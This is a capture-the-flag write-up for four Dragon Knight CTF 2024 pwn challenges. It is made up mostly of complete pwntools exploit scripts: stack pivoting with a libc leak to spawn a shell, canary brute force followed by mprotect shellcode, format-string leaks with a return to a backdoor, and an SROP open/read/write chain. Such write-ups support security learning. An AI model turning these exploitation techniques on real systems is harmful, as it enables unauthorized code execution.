
Dragon Knight CTF 2024 pwn wp

Dragon Knight CTF 2024 pwn wp

stack

非常经典的栈迁移例子

from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
# pwntools process-wide settings: target ISA for asm()/packing, and the
# terminal used when gdb.attach() spawns a debugger window.
context.arch = 'amd64'
context.terminal = ['gnome-terminal', '-e']
#context.log_level = 'debug'  # uncomment to trace every send/recv

# Paths to the challenge binary and the libc it ships with; both are
# parsed once at import so exp() can look up symbols and GOT/PLT slots.
local_file = '/home/feichai/ctf_file/pwn'
local_libc = '/home/feichai/ctf_file/libc-2.31.so'
elf = ELF(local_file)
libc = ELF(local_libc, checksec=False)

def start():
    """Open the target and return the pwntools tube.

    Selection is driven by pwntools' command-line flags: ``GDB`` runs the
    binary locally with a debugger attached, ``PROCESS`` runs it locally
    without one, and anything else connects to the remote instance.
    """
    if args.GDB:
        gdbscript = '''
'''
        io = process(local_file)
        gdb.attach(io, gdbscript)
        return io
    if args.PROCESS:
        return process(local_file)
    return remote("challenge.qsnctf.com", 31728)

def lg(s, addr):
    """Log ``s`` with ``addr`` rendered in hex, highlighted in bold yellow."""
    bold_yellow, reset = '\033[1;33m', '\033[0m'
    return info(bold_yellow + f'{s}-->0x{addr:02x}' + reset)

# Short I/O helpers. Each one looks up the module-level ``io`` at call time,
# so they may be defined before the connection exists.
def r(a):
    """Receive up to ``a`` bytes."""
    return io.recv(a)


def ru(a):
    """Receive until ``a`` is seen; the delimiter is kept."""
    return io.recvuntil(a)


def s(a):
    """Send ``a`` as-is."""
    return io.send(a)


def sa(a, b):
    """Wait for ``a``, then send ``b``."""
    return io.sendafter(a, b)


def sl(a):
    """Send ``a`` followed by a newline."""
    return io.sendline(a)


def sla(a, b):
    """Wait for ``a``, then send ``b`` followed by a newline."""
    return io.sendlineafter(a, b)


io = start()

def exp():
    """Three writes at the 'pivoting?' prompt: pivot, leak libc, call system.

    Each write is 0x100 bytes of buffer followed by the saved-rbp and
    return-address slots the overflow reaches. The rbp values are chosen so
    that the next read lands inside ``bss`` and ``leave_ret`` moves rsp onto
    the chain that was just written.
    """

    puts_plt=elf.plt.puts
    puts_got=elf.got.puts

    # Gadgets are hard-coded for this non-PIE build of the challenge binary.
    pop_rdi = 0x0000000000401210
    leave_ret = 0x00000000004011be
    bss = 0x404040 + 0x500
    pop_rbp = 0x000000000040115d

    # Write 1: only move rbp to bss+0x100 and re-enter 0x40118F, which is
    # presumably the read routine with its buffer at rbp-0x100 (confirm in
    # the binary); if so, the next write lands at bss.
    pd = b'a'*0x100+p64(bss+0x100)+p64(0x40118F)
    sa(b'pivoting?',pd)

    # Write 2 (at bss): puts(puts@got) to leak libc, then reset rbp to
    # bss+0x500 and read once more. Its own rbp slot is bss-8 so that
    # leave;ret puts rsp exactly on the chain at bss.
    pd=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)
    pd+=p64(pop_rbp)+p64(bss+0x500)+p64(0x40118F)
    pd=pd.ljust(0x100,b"\x00")+p64(bss-0x8)+p64(leave_ret)
    sa(b'pivoting?',pd)

    # A user-space libc pointer on x86-64 Linux ends in 0x7f; keep the last
    # 6 bytes and zero-extend. Offsets come from the shipped libc-2.31.so,
    # so the remote libc must be exactly that build.
    leak_libc = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))
    libc_base = leak_libc-libc.symbols[b'puts']
    libc_system = libc_base + libc.symbols[b'system']
    bin_sh_addr = libc_base + next(libc.search(b'/bin/sh'))

    # Write 3: system("/bin/sh"). With rbp = bss+0x500 the buffer would sit
    # at bss+0x400 under the same rbp-0x100 assumption, so the rbp slot is
    # that address minus 8 and leave;ret pivots onto it.
    pd=p64(pop_rdi)+p64(bin_sh_addr)+p64(libc_system)
    pd=pd.ljust(0x100,b"\x00")+p64(bss+0x500-0x100-0x8)+p64(leave_ret)

    sa(b'pivoting?',pd)


    io.interactive()

# Entry point guard: run the solve only when executed as a script.
if __name__ == "__main__":
    exp()

canary

爆破canary然后用mprotect提权

from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
# pwntools process-wide settings: target ISA for asm()/packing, and the
# terminal used when gdb.attach() spawns a debugger window.
context.arch = 'amd64'
context.terminal = ['gnome-terminal', '-e']
#context.log_level = 'debug'  # uncomment to trace every send/recv

# The challenge binary, parsed once at import.
local_file = '/home/feichai/ctf_file/pwn'
elf = ELF(local_file)

def start():
    """Open the target and return the pwntools tube.

    Selection is driven by pwntools' command-line flags: ``GDB`` runs the
    binary locally with a debugger attached, ``PROCESS`` runs it locally
    without one, and anything else connects to the remote instance.
    """
    if args.GDB:
        gdbscript = '''
'''
        io = process(local_file)
        gdb.attach(io, gdbscript)
        return io
    if args.PROCESS:
        return process(local_file)
    return remote("challenge.qsnctf.com",30537)

def lg(s, addr):
    """Log ``s`` with ``addr`` rendered in hex, highlighted in bold yellow."""
    bold_yellow, reset = '\033[1;33m', '\033[0m'
    return info(bold_yellow + f'{s}-->0x{addr:02x}' + reset)

# Short I/O helpers. Each one looks up the module-level ``io`` at call time,
# so they may be defined before the connection exists.
def r(a):
    """Receive up to ``a`` bytes."""
    return io.recv(a)


def ru(a):
    """Receive until ``a`` is seen; the delimiter is kept."""
    return io.recvuntil(a)


def s(a):
    """Send ``a`` as-is."""
    return io.send(a)


def sa(a, b):
    """Wait for ``a``, then send ``b``."""
    return io.sendafter(a, b)


def sl(a):
    """Send ``a`` followed by a newline."""
    return io.sendline(a)


def sla(a, b):
    """Wait for ``a``, then send ``b`` followed by a newline."""
    return io.sendlineafter(a, b)


io = start()

def exp():
    """Recover the stack canary byte by byte, then run shellcode from a
    page made executable with mprotect.

    The guessing loop depends on two things the code only assumes: every
    attempt is answered (a wrong byte produces the ``smashing`` text of the
    stack-protector abort), and the canary stays the same across attempts,
    which presumably means a forking service — confirm against the target.
    """

    ru(b'input:\n')
    # The canary's low byte is 0x00 on x86-64 glibc, so 7 bytes are guessed.
    canary = b'\x00'
    for k in range(7):  # k is unused; this just runs seven rounds
        for i in range(256):
            #sleep(0.1)
            # 0x108 bytes of filler reach the canary slot; the known prefix
            # plus one candidate byte overwrites it.
            s(b'a'*0x108 + canary + p8(i))
            aa = ru(b'\n')
            print(i)  # progress output only
            if b'smashing' in aa:
                # Wrong byte: drain the rest of the abort message before
                # the next attempt.
                ru(b'\n')
            else:
                canary += p8(i)
                print(b"canary: " + canary)
                break

    # Gadgets are hard-coded for this build.
    pop_rdi = 0x00000000004018c2
    pop_rsi = 0x000000000040f23e
    pop_rdx = 0x00000000004017cf

    # Filler, the recovered canary, then 8 bytes in the saved-rbp slot.
    pd = b'a'*0x108 + canary + b'A'*8

    got_plt = 0x4c1000
    call_mprotect = 0x449774
    call_read = 0x448920

    # mprotect(got_plt, 0x1000, 7): 7 is PROT_READ|PROT_WRITE|PROT_EXEC.
    pd += p64(pop_rdi) + p64(got_plt)
    pd += p64(pop_rsi) + p64(0x1000)
    pd += p64(pop_rdx) + p64(7)
    pd += p64(call_mprotect)

    # read(0, got_plt, 0xff), then return into got_plt itself, i.e. into
    # whatever the following send delivers.
    pd += p64(pop_rdi) + p64(0)
    pd += p64(pop_rsi) + p64(got_plt)
    pd += p64(pop_rdx) + p64(0xff)
    pd += p64(call_read) + p64(got_plt)

    s(pd)
    # Short pause, presumably so the two sends are not coalesced into the
    # first read before the chain reaches its own read().
    sleep(0.1)
    sc = asm(shellcraft.sh())
    s(sc)


    io.interactive()

# Entry point guard: run the solve only when executed as a script.
if __name__ == "__main__":
    exp()

ez_quiz

解密不太会,用gpt写的,然后就是eval计算,fmt泄露基址,溢出返回backdoor

from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
# pwntools process-wide settings: target ISA for asm()/packing, and the
# terminal used when gdb.attach() spawns a debugger window.
context.arch = 'amd64'
context.terminal = ['gnome-terminal', '-e']
#context.log_level = 'debug'  # uncomment to trace every send/recv

# The challenge binary, parsed once at import; the libc is whichever one
# pwntools resolves for it (elf.libc), so symbol offsets follow that file.
local_file = '/home/feichai/ctf_file/ez_quiz'
elf = ELF(local_file)
local_libc = elf.libc.path
libc = ELF(local_libc, checksec=False)

def start():
    """Open the target and return the pwntools tube.

    Selection is driven by pwntools' command-line flags: ``GDB`` runs the
    binary locally with a debugger attached (breaking at the PIE-relative
    address in ``gdbscript``), ``PROCESS`` runs it locally without one, and
    anything else connects to the remote instance.
    """
    if args.GDB:
        gdbscript = '''
b *$rebase(0x1E71)
'''
        io = process(local_file)
        gdb.attach(io, gdbscript)
        return io
    if args.PROCESS:
        return process(local_file)
    return remote("challenge.qsnctf.com", 30162)

def lg(s, addr):
    """Log ``s`` with ``addr`` rendered in hex, highlighted in bold yellow."""
    bold_yellow, reset = '\033[1;33m', '\033[0m'
    return info(bold_yellow + f'{s}-->0x{addr:02x}' + reset)

# Short I/O helpers. Each one looks up the module-level ``io`` at call time,
# so they may be defined before the connection exists.
def r(a):
    """Receive up to ``a`` bytes."""
    return io.recv(a)


def ru(a):
    """Receive until ``a`` is seen; the delimiter itself is dropped."""
    return io.recvuntil(a, drop=True)


def s(a):
    """Send ``a`` as-is."""
    return io.send(a)


def sa(a, b):
    """Wait for ``a``, then send ``b``."""
    return io.sendafter(a, b)


def sl(a):
    """Send ``a`` followed by a newline."""
    return io.sendline(a)


def sla(a, b):
    """Wait for ``a``, then send ``b`` followed by a newline."""
    return io.sendlineafter(a, b)


io = start()

def exp():
    """Answer the quiz, leak the PIE base and canary through the format
    string, then overflow the return address with ``backdoor``."""
    sla("Please give me your token:",'DRKCTF{P13@s3_1e@k_thE_addr_0f_7he_cAnARy_@nd_pie}')
    ru('Right!')
    # NOTE(review): eval() executes whatever text the remote peer sends up to
    # the '=' (ru drops the delimiter). The challenge only sends arithmetic,
    # but a hostile or compromised endpoint could run arbitrary Python inside
    # this script; an ast-based arithmetic evaluator would be the safe form.
    ans = eval(ru('='))
    sla('?',str(ans))

    # Format-string leak. %13$p is presumably a code pointer and %11$p the
    # canary; the original '# 6' note gives no further detail.
    sla('gift:\n','%13$p%11$p') # 6
    leak_pie = int(r(14),16)  # "0x" + 12 hex digits
    canary = int(r(18),16)    # "0x" + 16 hex digits
    lg('leak_pie',leak_pie)
    lg('canary',canary)

    # Offsets are specific to this build of ez_quiz.
    pie_base = leak_pie - 0x2042
    backdoor = pie_base + 0x1426
    # 0x28 bytes of filler, the canary, one qword for what is presumably the
    # saved rbp (any value), then the return address.
    pd = b'a'*(0x30-8)+p64(canary)+p64(1)+p64(backdoor)
    sl(pd)


    io.interactive()

# Entry point guard: run the solve only when executed as a script.
if __name__ == "__main__":
    exp()

srop_seccomp

题目即考点,基础题

from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
# pwntools process-wide settings: target ISA for asm()/packing/SigreturnFrame,
# and the terminal used when gdb.attach() spawns a debugger window.
context.arch = 'amd64'
context.terminal = ['gnome-terminal', '-e']
#context.log_level = 'debug'  # uncomment to trace every send/recv

# The challenge binary, parsed once at import.
local_file = '/home/feichai/ctf_file/chall'
elf = ELF(local_file)

def start():
    """Open the target and return the pwntools tube.

    Selection is driven by pwntools' command-line flags: ``GDB`` runs the
    binary locally with a debugger attached, ``PROCESS`` runs it locally
    without one, and anything else connects to the remote instance.
    """
    if args.GDB:
        gdbscript = '''
'''
        io = process(local_file)
        gdb.attach(io, gdbscript)
        return io
    if args.PROCESS:
        return process(local_file)
    return remote("challenge.qsnctf.com", 30374)

def lg(s, addr):
    """Log ``s`` with ``addr`` rendered in hex, highlighted in bold yellow."""
    bold_yellow, reset = '\033[1;33m', '\033[0m'
    return info(bold_yellow + f'{s}-->0x{addr:02x}' + reset)

# Short I/O helpers. Each one looks up the module-level ``io`` at call time,
# so they may be defined before the connection exists.
def r(a):
    """Receive up to ``a`` bytes."""
    return io.recv(a)


def ru(a):
    """Receive until ``a`` is seen; the delimiter is kept."""
    return io.recvuntil(a)


def s(a):
    """Send ``a`` as-is."""
    return io.send(a)


def sa(a, b):
    """Wait for ``a``, then send ``b``."""
    return io.sendafter(a, b)


def sl(a):
    """Send ``a`` followed by a newline."""
    return io.sendline(a)


def sla(a, b):
    """Wait for ``a``, then send ``b`` followed by a newline."""
    return io.sendlineafter(a, b)


io = start()

def exp():
    """SROP chain: open("flag"), read it into bss, write it to stdout.

    All three sigreturn frames are staged in one 0x400-byte write at ``bss``
    (first prompt), with the path string placed right after them at
    ``flag_addr``. The second prompt's overflow sets saved rbp to ``bss-8``
    and returns into ``leave_ret`` so rsp lands on the chain. open/read/write
    is used instead of execve, consistent with the seccomp filter the
    challenge name suggests — not verified here.
    """

    # Addresses are hard-coded for this non-PIE build of chall.
    bss = 0x404060
    mov_rax_0xf = 0x0000000000401193  # rax = 0xf, SYS_rt_sigreturn on x86-64
    syscall = 0x000000000040118a
    flag_addr = bss+0x400
    leave_ret = 0x000000000040136c
    ret = 0x0000000000401016  # unused below

    # Frame 1: open(flag_addr, 0, 0). rsp/rbp point at the qword right after
    # this frame (bss+0x10+0xf8) so execution continues along the chain.
    sigopen = SigreturnFrame()
    sigopen.rax = 2
    sigopen.rdi = flag_addr
    sigopen.rsi = 0
    sigopen.rdx = 0
    sigopen.rsp = bss+0x108
    sigopen.rbp = bss+0x108
    sigopen.rip = syscall

    # Frame 2: read(3, bss+0x700, 0x100); fd 3 assumes open() returned the
    # first free descriptor.
    sigread = SigreturnFrame()
    sigread.rax = 0
    sigread.rdi = 3
    sigread.rsi = bss + 0x700
    sigread.rdx = 0x100
    sigread.rsp = bss+0x218
    sigread.rbp = bss+0x218
    sigread.rip = syscall

    # Frame 3: write(1, bss+0x700, 0x100). rsp/rbp are left at their
    # defaults (the commented lines), so nothing useful runs afterwards.
    sigwrite = SigreturnFrame()
    sigwrite.rax = 1
    sigwrite.rdi = 1
    sigwrite.rsi = bss + 0x700
    sigwrite.rdx = 0x100
    #sigwrite.rsp = bss+0x320
    #sigwrite.rbp = bss+0x320
    sigwrite.rip = syscall

    # Each "mov rax,0xf; syscall" pair triggers sigreturn on the frame that
    # follows it. The p64(0x1) before the later pairs sits exactly where the
    # previous frame set rsp/rbp; presumably the gadget at ``syscall``
    # executes a leave before its ret and this qword is the rbp it pops —
    # confirm in the binary.
    pd = p64(mov_rax_0xf)+p64(syscall)
    pd += bytes(sigopen)

    pd += p64(0x1)+p64(mov_rax_0xf)+p64(syscall)
    pd += bytes(sigread)

    pd += p64(0x1)+p64(mov_rax_0xf)+p64(syscall)
    pd += bytes(sigwrite)

    # Pad to 0x400 so the NUL-terminated path sits exactly at flag_addr.
    pd = pd.ljust(0x400,b'\x00')+b'flag\x00'

    sa(b'easyhack',pd)

    # 0x2a bytes of filler reach saved rbp; leave;ret then moves rsp to
    # bss-8, pops rbp, and returns into the first gadget at bss.
    pd = b'a'*0x2a+p64(bss-8) + p64(leave_ret)
    sa(b'SUID?\n',pd)

    io.interactive()

# Entry point guard: run the solve only when executed as a script.
if __name__ == "__main__":
    exp()